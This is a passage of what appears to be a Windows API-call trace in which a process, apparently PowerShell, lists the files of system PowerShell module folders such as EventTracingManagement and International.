ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 0 [0226.184] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.185] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.185] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.198] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0226.228] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.229] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.229] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.229] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.229] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.229] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.230] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.230] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 0 [0226.230] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.230] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.230] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.231] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0226.231] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a [0226.231] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.231] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.231] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0226.232] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.232] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.232] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.232] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.232] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.232] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.232] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.232] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.233] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.233] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0226.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.233] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.233] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0226.233] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\", lpFilePart=0x0) returned 0x4a [0226.233] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.234] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.234] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.psd1", cAlternateFileName="")) returned 1 [0226.234] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.234] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2353, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.234] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_AutologgerConfig_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.235] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.235] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceProvider_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.235] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.235] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 1 [0226.235] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_EtwTraceSession_v1.0.format.ps1xml", cAlternateFileName="")) returned 0 [0226.236] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.236] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1")) returned 0x20 [0226.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.236] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0226.236] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0226.236] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.237] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.237] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0226.237] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 0 [0226.237] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.237] SetThreadErrorMode 